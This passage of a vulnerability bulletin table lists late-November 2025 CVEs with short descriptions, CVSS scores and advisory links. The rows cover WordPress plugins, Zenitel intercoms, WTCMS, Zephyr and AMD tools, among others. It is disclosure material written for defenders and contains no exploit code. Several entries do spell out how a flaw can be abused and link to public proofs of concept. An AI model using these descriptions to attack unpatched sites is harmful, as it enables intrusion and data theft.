| scripteo--Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager | The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to time-based SQL Injection via the 'site_id' parameter in all versions up to, and including, 4.95 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-24 | 7.5 | CVE-2025-7402 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5548b97d-14f0-4f50-b213-a19c02c240be?source=cve https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010 |
| Sneeit--Sneeit Framework | The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leveraged to inject backdoors or, for example, create new administrative user accounts. | 2025-11-25 | 9.8 | CVE-2025-6389 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b5ed8a39-50b0-4acf-9054-ba389c49f345?source=cve https://themeforest.net/item/flat-news-responsive-magazine-wordpress-theme/6000513#item-description__release-notes |
| sonalsinha21--SKT PayPal for WooCommerce | The SKT PayPal for WooCommerce plugin for WordPress is vulnerable to Payment Bypass in all versions up to, and including, 1.4. This is due to the plugin only enforcing client side controls instead of server-side controls when processing payments. This makes it possible for unauthenticated attackers to make confirmed purchases without actually paying for them. | 2025-11-27 | 7.5 | CVE-2025-7820 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a67b1b3-eb39-4e9a-ba44-ea637fc3bba1?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403118%40skt-paypal-for-woocommerce&new=3403118%40skt-paypal-for-woocommerce&sfp_email=&sfph_mail= |
| soportecibeles--AI Feeds | The AI Feeds plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check in the 'actualizador_git.php' file in all versions up to, and including, 1.0.11. This makes it possible for unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files on the affected site's server which may make remote code execution possible. | 2025-11-25 | 9.8 | CVE-2025-13597 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5007dd0-a62c-4ad8-8f8b-eb3f4387c370?source=cve https://plugins.trac.wordpress.org/browser/ai-feeds/trunk/actualizador_git.php#L1 https://plugins.trac.wordpress.org/changeset/3402321/ai-feeds https://github.com/d0n601/CVE-2025-13597 https://ryankozak.com/posts/cve-2025-13597 |
| soportecibeles--CIBELES AI | The CIBELES AI plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check in the 'actualizador_git.php' file in all versions up to, and including, 1.10.8. This makes it possible for unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files on the affected site's server which may make remote code execution possible. | 2025-11-25 | 9.8 | CVE-2025-13595 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b3e89a1c-7606-4391-a389-fa18d0967046?source=cve https://plugins.trac.wordpress.org/browser/cibeles-ai/trunk/actualizador_git.php#L1 https://plugins.trac.wordpress.org/changeset/3402311/cibeles-ai https://github.com/d0n601/CVE-2025-13595 https://ryankozak.com/posts/cve-2025-13595/ |
| taosir--WTCMS | A vulnerability was identified in taosir WTCMS up to 01a5f68a3dfc2fdddb44eed967bb2d4f60487665. Affected by this issue is the function delete of the file application/Admin/Controller/SlideController.class.php of the component SlideController. The manipulation of the argument ids leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 7.3 | CVE-2025-13782 | VDB-333786 \| taosir WTCMS SlideController SlideController.class.php delete sql injection VDB-333786 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #688837 \| wtcms cms 1.0 SQL Injection https://www.yuque.com/shangu-vvuup/ydpg69/amhlbdhkw0pgt44g?singleDoc |
| taosir--WTCMS | A vulnerability was detected in taosir WTCMS up to 01a5f68a3dfc2fdddb44eed967bb2d4f60487665. Impacted is the function fetch of the file /index.php. Performing manipulation of the argument content results in code injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. This product uses a rolling release to provide continuous delivery; therefore, no version details for affected or updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 7.3 | CVE-2025-13786 | VDB-333790 \| taosir WTCMS index.php fetch code injection VDB-333790 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689523 \| wtcms cms 1.0 RCE https://github.com/TiKi-r/CVE-Report/blob/main/WtcmsRCE.md https://github.com/TiKi-r/CVE-Report/blob/main/WtcmsRCE.md#3-proof-of-concept-poc |
| Tryton--trytond | Tryton trytond 6.0 before 7.6.11 does not enforce access rights for the route of the HTML editor. This is fixed in 7.6.11, 7.4.21, 7.0.40, and 6.0.70. | 2025-11-30 | 7.1 | CVE-2025-66423 | https://discuss.tryton.org/t/security-release-for-issue-14364/8952 https://foss.heptapod.net/tryton/tryton/-/issues/14364 |
| Uniong--WebITR | WebITR developed by Uniong has an Authentication Bypass vulnerability, allowing authenticated remote attackers to log into the system as any user by modifying a specific parameter. Attackers must first obtain a user ID to exploit this vulnerability. | 2025-11-28 | 7.5 | CVE-2025-13768 | https://www.twcert.org.tw/tw/cp-132-10538-6a26d-1.html https://www.twcert.org.tw/en/cp-139-10539-21f45-2.html |
| unitecms--Unlimited Elements for Elementor (Premium) | The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. A form with a file upload field must be created with the premium version of the plugin in order to exploit the vulnerability. However, once the form exists, the vulnerability is exploitable even if the premium version is deactivated and/or uninstalled. | 2025-11-27 | 7.2 | CVE-2025-13692 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae603b13-dc09-4f83-8741-943d62615b3c?source=cve https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L598 https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1952 https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1960 https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_filters_process.class.php#L3279 https://plugins.trac.wordpress.org/changeset/3403331/ https://unlimited-elements.com/change-log/ |
| venusweb--EduKart Pro | The EduKart Pro plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.3. This is due to the 'edukart_pro_register_user_front_end' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-11-25 | 9.8 | CVE-2025-13559 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d3a5be68-8073-48b0-a536-bb3a05e83dda?source=cve https://themeforest.net/item/edit-edukart-online-courses-education-lms-theme/52094805 |
| Zenitel--TCIV-3+ | An OS command injection vulnerability exists due to improper input validation. The application accepts a parameter directly from user input without verifying it is a valid IP address or filtering potentially malicious characters. This could allow an unauthenticated attacker to inject arbitrary commands. | 2025-11-26 | 10 | CVE-2025-64126 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| Zenitel--TCIV-3+ | An OS command injection vulnerability exists due to insufficient sanitization of user-supplied input. The application accepts parameters that are later incorporated into OS commands without adequate validation. This could allow an unauthenticated attacker to execute arbitrary commands remotely. | 2025-11-26 | 10 | CVE-2025-64127 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| Zenitel--TCIV-3+ | An OS command injection vulnerability exists due to incomplete validation of user-supplied input. Validation fails to enforce sufficient formatting rules, which could permit attackers to append arbitrary data. This could allow an unauthenticated attacker to inject arbitrary commands. | 2025-11-26 | 10 | CVE-2025-64128 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| Zenitel--TCIV-3+ | Zenitel TCIV-3+ is vulnerable to a reflected cross-site scripting vulnerability, which could allow a remote attacker to execute arbitrary JavaScript on the victim's browser. | 2025-11-26 | 9.8 | CVE-2025-64130 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| Zenitel--TCIV-3+ | Zenitel TCIV-3+ is vulnerable to an out-of-bounds write vulnerability, which could allow a remote attacker to crash the device. | 2025-11-26 | 7.6 | CVE-2025-64129 | https://wiki.zenitel.com/wiki/Downloads#Station_and_Device_Firmware_Package_.28VS-IS.29 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-03.json |
| zephyrproject-rtos--Zephyr | An out-of-bound write can lead to an arbitrary code execution. Even on devices with some form of memory protection, this can still lead to a crash and a resultant denial of service. | 2025-11-26 | 7.6 | CVE-2025-9557 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-r3j3-c5v7-2ppf |
| zephyrproject-rtos--Zephyr | There is a potential OOB Write vulnerability in the gen_prov_start function in pb_adv.c. The full length of the received data is copied into the link.rx.buf receiver buffer without any validation on the data size. | 2025-11-26 | 7.6 | CVE-2025-9558 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8wvr-688x-68vr |
| ZTE--ElasticNet UME R32 | Improper Privilege Management vulnerability in ZTE ElasticNet UME R32 on Linux allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects ElasticNet UME R32: ElasticNet_UME_R32_V16.23.20.04. | 2025-11-27 | 7.5 | CVE-2025-66314 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2180460616364429350 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| ABB--Terra AC wallbox | Stack-based Buffer Overflow vulnerability in ABB Terra AC wallbox. This issue affects Terra AC wallbox: through 1.8.33. | 2025-11-28 | 6.1 | CVE-2025-12143 | https://search.abb.com/library/Download.aspx?DocumentID=9AKK108471A8107&LanguageCode=en&DocumentPartId=&Action=Launch |
| AMD--AMD Prof | Improper input validation within AMD uProf can allow a local attacker to write out of bounds, potentially resulting in a crash or denial of service. | 2025-11-24 | 5.5 | CVE-2025-29933 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html |
| AMD--AMD Prof | Improper input validation within AMD uProf can allow a local attacker to write to an arbitrary physical address, potentially resulting in a crash or denial of service. | 2025-11-24 | 5.5 | CVE-2025-48511 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html |
| AMD--Xilinx Run Time (XRT) | Insufficient validation within Xilinx Run Time framework could allow a local attacker to escalate privileges from user space to kernel space, potentially compromising confidentiality, integrity, and/or availability. | 2025-11-24 | 5.7 | CVE-2025-0007 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| Anjaliavv51--Retro | Retro is an online platform providing items of vintage collections. Prior to version 2.4.7, Retro is vulnerable to a cross-site scripting (XSS) in the input handling component. This issue has been patched in version 2.4.7. | 2025-11-29 | 6.1 | CVE-2025-66036 | https://github.com/Anjaliavv51/Retro/security/advisories/GHSA-gvv6-p6h6-2vj2 |
| appglut--Locker Content | The Locker Content plugin for WordPress is vulnerable to Sensitive Information Exposure in version 1.0.0 via the 'lockerco_submit_post' AJAX endpoint. This makes it possible for unauthenticated attackers to extract content from posts that has been protected by the plugin. | 2025-11-25 | 5.3 | CVE-2025-12525 | https://www.wordfence.com/threat-intel/vulnerabilities/id/927f94b0-2a5d-4d17-a05b-7940d7976158?source=cve https://wordpress.org/plugins/locker-content/ |
| assafp--Poll, Survey & Quiz Maker Plugin by Opinion Stage | The Poll, Survey & Quiz Maker Plugin by Opinion Stage plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 19.12.0. This is due to missing or insufficient nonce validation on the disconnect_account_action function. This makes it possible for unauthenticated attackers to disconnect the site from the Opinion Stage platform integration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-27 | 4.3 | CVE-2025-13143 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2c16048a-6b05-48ef-92c3-6e3a42909adb?source=cve https://plugins.trac.wordpress.org/browser/social-polls-by-opinionstage/tags/19.12.0/src/Modules/Admin.php#L195 https://plugins.trac.wordpress.org/browser/social-polls-by-opinionstage/tags/19.12.0/src/Modules/Admin.php#L196 |
| autochat--Autochat Automatic Conversation | The Autochat Automatic Conversation plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_auycht_saveCid' AJAX endpoint in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to connect and disconnect the client ID. | 2025-11-25 | 5.3 | CVE-2025-12043 | https://www.wordfence.com/threat-intel/vulnerabilities/id/089b3a1b-0f4b-4ba5-85d8-c1f6b74fe7eb?source=cve https://wordpress.org/plugins/auyautochat-for-wp/ |
| ays-pro--AI ChatBot with ChatGPT and Content Generator by AYS | The AI ChatBot with ChatGPT and Content Generator by AYS plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.7.0 via the ays_chatgpt_pinecone_upsert function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-11-27 | 6.5 | CVE-2025-13378 | https://www.wordfence.com/threat-intel/vulnerabilities/id/293ad145-dc93-4d7a-83ba-78f8c730ed6d?source=cve https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/admin/class-chatgpt-assistant-admin.php#L3483 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/trunk/admin/class-chatgpt-assistant-admin.php#L3483 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/trunk/includes/class-chatgpt-assistant.php#L222 https://plugins.trac.wordpress.org/changeset/3402237/ays-chatgpt-assistant/tags/2.7.1/admin/class-chatgpt-assistant-admin.php?old=3382650&old_path=ays-chatgpt-assistant%2Ftags%2F2.6.9%2Fadmin%2Fclass-chatgpt-assistant-admin.php |
| ays-pro--AI ChatBot with ChatGPT and Content Generator by AYS | The AI ChatBot with ChatGPT and Content Generator by AYS plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'ays_chatgpt_save_wp_media' function in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to upload media files. | 2025-11-27 | 5.3 | CVE-2025-13381 | https://www.wordfence.com/threat-intel/vulnerabilities/id/be3411ec-0e34-4b0b-a04c-98ac94396989?source=cve https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/admin/class-chatgpt-assistant-admin.php#L3585 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/includes/class-chatgpt-assistant.php#L222 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/admin/class-chatgpt-assistant-admin.php#L3268 https://plugins.trac.wordpress.org/browser/ays-chatgpt-assistant/tags/2.6.9/admin/class-chatgpt-assistant-admin.php#L3597 https://plugins.trac.wordpress.org/changeset/3402237/ays-chatgpt-assistant/tags/2.7.1/admin/class-chatgpt-assistant-admin.php?old=3382650&old_path=ays-chatgpt-assistant%2Ftags%2F2.6.9%2Fadmin%2Fclass-chatgpt-assistant-admin.php |
| bestweblayout--Job Board by BestWebSoft | The Job Board by BestWebSoft plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.2.1. This is due to the plugin storing the entire unsanitized `$_GET` superglobal array directly into the database via `update_user_meta()` when users save search results, and later outputting this data without proper escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute whenever a user accesses the saved search or views their profile, granted they can trick the user into performing the search and saving the results. | 2025-11-25 | 6.1 | CVE-2025-13383 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1eb1622f-19fb-472e-871b-9a456f80f390?source=cve https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L2354 https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L2355 https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L1680 |
| buywptemplates--Ace Post Type Builder | The Ace Post Type Builder plugin for WordPress is vulnerable to unauthorized custom taxonomy deletion due to missing authorization validation on the cptb_delete_custom_taxonomy() function in all versions up to, and including, 1.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary custom taxonomies. | 2025-11-25 | 5.3 | CVE-2025-13405 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b56cef33-057b-4c40-945f-68306597b00b?source=cve https://plugins.trac.wordpress.org/browser/ace-post-type-builder/trunk/includes/class-cptb-core.php#L400 https://plugins.trac.wordpress.org/browser/ace-post-type-builder/tags/1.9/includes/class-cptb-core.php#L400 |
| bylancer--Bookme Free Online Appointment Booking and Scheduling Plugin | The Bookme - Free Online Appointment Booking and Scheduling Plugin for WordPress is vulnerable to time-based SQL Injection via the `filter[status]` parameter in all versions up to, and including, 4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-25 | 4.9 | CVE-2025-13385 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f2c17222-5de5-4ecd-a7c6-beabe7624c5b?source=cve https://plugins.trac.wordpress.org/browser/bookme-free-appointment-booking-system/tags/4.2/app/admin/Bookings.php#L123 https://plugins.trac.wordpress.org/browser/bookme-free-appointment-booking-system/trunk/app/admin/Bookings.php#L123 |
| bytecodealliance--wasm-micro-runtime | WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, an out-of-bounds array access issue exists in WAMR's fast interpreter mode during WASM bytecode loading. When frame_ref_bottom and frame_offset_bottom arrays are at capacity and a GET_GLOBAL(I32) opcode is encountered, frame_ref_bottom is expanded but frame_offset_bottom may not be. If this is immediately followed by an if opcode that triggers preserve_local_for_block, the function traverses arrays using stack_cell_num as the upper bound, causing out-of-bounds access to frame_offset_bottom since it wasn't expanded to match the increased stack_cell_num. This issue has been patched in version 2.4.4. | 2025-11-25 | 5.1 | CVE-2025-64713 | https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-gvx3-gg3x-rjcx https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4 |
| bytecodealliance--wasm-micro-runtime | WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, WAMR is susceptible to a segmentation fault in v128.store instruction. This issue has been patched in version 2.4.4. | 2025-11-25 | 4.7 | CVE-2025-64704 | https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-2f2p-wf5w-82qr https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4 |
| caido--caido | Caido is a web security auditing toolkit. Prior to version 0.53.0, the Markdown renderer used in Caido's Findings page improperly handled user-supplied Markdown, allowing attacker-controlled links to be rendered without confirmation. When a user opened a finding generated through the scanner, or other plugins, clicking these injected links could redirect the Caido application to an attacker-controlled domain, enabling phishing style attacks. This issue has been patched in version 0.53.0. | 2025-11-26 | 4.3 | CVE-2025-66025 | https://github.com/caido/caido/security/advisories/GHSA-cf52-h5mw-gmc2 |
| cilium--cilium | Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.16.17, 1.17.10, and 1.18.4, CiliumNetworkPolicys which use egress.toGroups.aws.securityGroupsIds to reference AWS security group IDs that do not exist or are not attached to any network interface may unintentionally allow broader outbound access than intended by the policy authors. In such cases, the toCIDRset section of the derived policy is not generated, which means outbound traffic may be permitted to more destinations than originally intended. This issue has been patched in versions 1.16.17, 1.17.10, and 1.18.4. There are no workarounds for this issue. | 2025-11-29 | 4 | CVE-2025-64715 | https://github.com/cilium/cilium/security/advisories/GHSA-38pp-6gcp-rqvm https://github.com/cilium/cilium/commit/a385856b59c8289cc7273fa3a3062bbf0ef96c97 https://github.com/cilium/cilium/releases/tag/v1.16.17 https://github.com/cilium/cilium/releases/tag/v1.17.10 https://github.com/cilium/cilium/releases/tag/v1.18.4 |
| code-projects--Blog Site | A security vulnerability has been detected in code-projects Blog Site 1.0. Impacted is the function category_exists of the file /resources/functions/blog.php of the component Category Handler. Such manipulation of the argument name/field leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. Multiple endpoints are affected. | 2025-11-24 | 6.3 | CVE-2025-13575 | VDB-333339 \| code-projects Blog Site Category blog.php category_exists sql injection VDB-333339 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698769 \| https://code-projects.org/ blog site in php with source code 1.0 SQL Injection Submit #698771 \| https://code-projects.org/ blog site in php with source code 1.0 SQL Injection (Duplicate) https://github.com/Yohane-Mashiro/cve/blob/main/SQL%20injection1.md https://github.com/Yohane-Mashiro/cve/blob/main/SQL%20injection2.md https://code-projects.org/ |
| code-projects--Blog Site | A vulnerability was detected in code-projects Blog Site 1.0. The affected element is an unknown function of the file /admin.php. Performing manipulation results in improper authorization. It is possible to initiate the attack remotely. The exploit is now public and may be used. Multiple endpoints are affected. | 2025-11-24 | 6.3 | CVE-2025-13576 | VDB-333340 \| code-projects Blog Site admin.php improper authorization VDB-333340 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698772 \| https://code-projects.org/ Blog Site In PHP With Source Code 1.0 Unauthorized https://github.com/Yohane-Mashiro/cve/blob/main/Unauthorized.md https://code-projects.org/ |
| code-projects--Library System | A vulnerability was found in code-projects Library System 1.0. This impacts an unknown function of the file /return.php. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2025-11-24 | 6.3 | CVE-2025-13579 | VDB-333343 \| code-projects Library System return.php sql injection VDB-333343 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699515 \| code-projects Library System 1.0 SQL Injection https://github.com/rassec2/dbcve/issues/2 https://code-projects.org/ |
| code-projects--Library System | A vulnerability was determined in code-projects Library System 1.0. Affected is an unknown function of the file /mail.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-24 | 6.3 | CVE-2025-13580 | VDB-333344 \| code-projects Library System mail.php sql injection VDB-333344 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699534 \| code-projects Library System 1.0 mail.php SQL Injection https://github.com/rassec2/dbcve/issues/3 https://code-projects.org/ |
| code-projects--Online Bidding System | A weakness has been identified in code-projects Online Bidding System 1.0. This issue affects the function categoryadd of the file /administrator/addcategory.php. This manipulation of the argument catimage causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. | 2025-11-24 | 4.7 | CVE-2025-13574 | VDB-333338 \| code-projects Online Bidding System addcategory.php categoryadd unrestricted upload VDB-333338 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698717 \| https://code-projects.org/ Online Bidding System In PHP With Source Code 1.0 Arbitrary File Upload Submit #698718 \| https://code-projects.org/ Online Bidding System In PHP With Source Code 1.0 Arbitrary File Upload (Duplicate) https://github.com/Yohane-Mashiro/cve/blob/main/upload%201.md https://code-projects.org/ |
| contao--contao | Contao is an Open Source CMS. From version 4.0.0 to before 4.13.57, before 5.3.42, and before 5.6.5, back end users with precise control over the contents of template closures can execute arbitrary PHP functions that do not have required parameters. This issue has been patched in versions 4.13.57, 5.3.42, and 5.6.5. A workaround for this issue involves manually patching the Contao\Template::once() method. | 2025-11-25 | 6.6 | CVE-2025-65960 | https://github.com/contao/contao/security/advisories/GHSA-98vj-mm79-v77r https://contao.org/en/security-advisories/remote-code-execution-in-template-closures |
| deco-cx--apps | A security vulnerability has been detected in deco-cx apps up to 0.120.1. Affected by this vulnerability is the function AnalyticsScript of the file website/loaders/analyticsScript.ts of the component Parameter Handler. Such manipulation of the argument url leads to server-side request forgery. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 0.120.2 addresses this issue. It is suggested to upgrade the affected component. | 2025-11-30 | 6.3 | CVE-2025-13796 | VDB-333807 \| deco-cx apps Parameter analyticsScript.ts AnalyticsScript server-side request forgery VDB-333807 \| CTI Indicators (IOB, IOC, IOA) Submit #691837 \| Deco deco-apps 0.114.12 - 0.120.1 Server-Side Request Forgery https://github.com/deco-cx/apps/pull/1360 https://github.com/deco-cx/apps/releases/tag/0.120.2 |
| docjojo--atec Duplicate Page & Post | The atec Duplicate Page & Post plugin for WordPress is vulnerable to unauthorized post duplication due to missing authorization validation on the duplicate_post() function in all versions up to, and including, 1.2.20. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate arbitrary posts, including private and password-protected posts, leading to data exposure. | 2025-11-25 | 5.3 | CVE-2025-13404 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a793b24f-979e-4209-93f7-cff8d3867a7d?source=cve https://plugins.trac.wordpress.org/browser/atec-duplicate-page-post/tags/1.2.20/includes/atec-wpdpp-hooks.php#L27 https://plugins.trac.wordpress.org/browser/atec-duplicate-page-post/tags/1.2.21/includes/atec-wpdpp-hooks.php#L27 |
| emrevona--WP Fastest Cache | The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpfc_db_fix_callback() function in all versions up to, and including, 1.4.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to initiate several database fix actions. This only affects sites with premium activated. | 2025-11-27 | 4.3 | CVE-2025-10476 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c24cf4de-1392-43a8-85a5-8c66c00c44d7?source=cve https://research.cleantalk.org/cve-2025-10476 https://plugins.trac.wordpress.org/changeset?old_path=/wp-fastest-cache/tags/1.4.0&new_path=/wp-fastest-cache/tags/1.4.1&sfp_email=&sfph_mail= |
| era404--StaffList | The StaffList plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-11-27 | 4.4 | CVE-2025-12185 | https://www.wordfence.com/threat-intel/vulnerabilities/id/45b9f761-1634-4f70-8c25-956d369cb6d8?source=cve https://wordpress.org/plugins/stafflist/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402164%40stafflist&new=3402164%40stafflist&sfp_email=&sfph_mail= |
| evolurise--Conditionnal Maintenance Mode for WordPress | The Conditional Maintenance Mode for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation when toggling the maintenance mode status. This makes it possible for unauthenticated attackers to enable or disable the site's maintenance mode via a forged request granted they can trick an administrator into performing an action such as clicking on a link. | 2025-11-25 | 4.3 | CVE-2025-12586 | https://www.wordfence.com/threat-intel/vulnerabilities/id/535f1d8a-8266-4f90-82fa-9c32181bf277?source=cve https://plugins.trac.wordpress.org/browser/maintenance-mode-based-on-user-roles/tags/1.0.0/Maintenance_mode.php#L178 |
| favethemes--Houzez | The Houzez theme for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.1.6 due to insufficient input sanitization and output escaping in the houzez_property_img_upload() and houzez_property_attachment_upload() functions. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-11-26 | 6.1 | CVE-2025-9163 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e0e177f3-fb24-4dd5-80d5-19b113d5f527?source=cve https://favethemes.zendesk.com/hc/en-us/articles/360041639432-Changelog |
| favethemes--Houzez | The Houzez theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.1.6 via deserialization of untrusted input in saved-search-item.php. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2025-11-26 | 6.3 | CVE-2025-9191 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b1c450d9-42d8-40f5-84fc-1bc0c8cfcf9b?source=cve https://favethemes.zendesk.com/hc/en-us/articles/360041639432-Changelog |
